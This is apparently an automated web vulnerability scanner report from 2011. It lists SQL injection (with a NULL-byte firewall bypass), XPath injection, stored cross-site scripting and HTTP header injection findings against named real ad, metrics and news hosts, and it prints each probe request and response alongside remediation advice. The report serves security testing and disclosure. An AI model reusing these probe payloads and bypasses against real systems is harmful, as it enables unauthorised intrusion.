There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://d3fd89.r.axf8.net/mr/e.gif [a parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://d3fd89.r.axf8.net
Path:   /mr/e.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A258447044937878%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ASacbee%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89'&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:59:22 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/e.gif?info=%7Bn%3Ac%7Cc%3A258447044937878%7Cd%3A1%7Ca%3AD3FD89%7Ch%3A1%7Ce%3ASacbee%7Cb%3Astory-detail%7Cl%3Ahttp%24*%24%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html%7Cm%3A1920%7Co%3A1200%7Cp%3AWin32%7Cg%3AChrome%7Cf%3A13.0.782.220%7D%7Bn%3Au%7Ce%3A1%7D&a=D3FD89''&r=1&s=1 HTTP/1.1
Host: d3fd89.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 37
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:59:23 GMT

gomez.b3(0,0);if(gomez.n0)gomez.n0();

1.2. http://ib.adnxs.com/getuidnb [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ib.adnxs.com
Path:   /getuidnb

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /getuidnb HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 500 No url
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 0
Connection: close

Request 2

GET /getuidnb HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:45 GMT; domain=.adnxs.com; HttpOnly
Location: P.T
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 0
Connection: close


1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/sprintuniversalsiteprod/1/H.22.1%00'/s88955233080778?AQB=1&pccr=true&vidn=273164E305162D78-600001A660177E59&&ndh=1&t=3%2F8%2F2011%2019%3A44%3A28%206%20300&ce=UTF-8&pageName=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&g=http%3A%2F%2Fwww.sprint.com%2F&r=http%3A%2F%2Fwww.sprint.com%2F&cc=USD&ch=Home%20Page&server=www.sprint.com&h1=Home%20Page%7CHP%20%3A%20IHP&h2=D%3Dg&c3=Interstitial%20Home%20Page&c4=HP%20%3A%20IHP&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&v29=D%3Dc43&v30=D%3Dch&c40=D%3Dc4&c42=Shockwave%20Flash%2010.3%20r183&c43=www.sprint.com&v44=105E1B5AD68B10D605E2BDF5FE0A4306&c45=Home%20Page%2BHP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&c46=7%3A30PM&c47=Saturday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:02:30 GMT
Server: Omniture DC/2.0.0
Content-Length: 433
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/sprintuniversalsiteprod/1/H.22.1 was not found
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/sprintuniversalsiteprod/1/H.22.1%00''/s88955233080778?AQB=1&pccr=true&vidn=273164E305162D78-600001A660177E59&&ndh=1&t=3%2F8%2F2011%2019%3A44%3A28%206%20300&ce=UTF-8&pageName=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&g=http%3A%2F%2Fwww.sprint.com%2F&r=http%3A%2F%2Fwww.sprint.com%2F&cc=USD&ch=Home%20Page&server=www.sprint.com&h1=Home%20Page%7CHP%20%3A%20IHP&h2=D%3Dg&c3=Interstitial%20Home%20Page&c4=HP%20%3A%20IHP&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&v29=D%3Dc43&v30=D%3Dch&c40=D%3Dc4&c42=Shockwave%20Flash%2010.3%20r183&c43=www.sprint.com&v44=105E1B5AD68B10D605E2BDF5FE0A4306&c45=Home%20Page%2BHP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page&c46=7%3A30PM&c47=Saturday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:02:30 GMT
Server: Omniture DC/2.0.0
xserver: www625
Content-Length: 0
Content-Type: text/html


2. XPath injection
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry'/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:30 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

2.2. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry/post'/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:30 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

3. Cross-site scripting (stored)
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/c5/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-504/c5/jsc/fm.js. The payload b395d"-alert(1)-"5904c46bd2c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/c5/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=b395d"-alert(1)-"5904c46bd2c&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Request 2

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=39:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=213
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:30 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b395d"-alert(1)-"5904c46bd2c,520d7%22%3b1cfa50ea780,520d7";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzD
...[SNIP]...

3.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/c5/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-504/c5/jsc/fm.js. The payload 609c0'-alert(1)-'ce33e99e75d was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/c5/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=609c0'-alert(1)-'ce33e99e75d&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Request 2

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=47:1:1:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=212
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:31 GMT
Content-Length: 1016
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d';z="+Math.random();}

if(zzuid=='un
...[SNIP]...

4. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 54f5b%0d%0a606b90e0140 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=54f5b%0d%0a606b90e0140&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
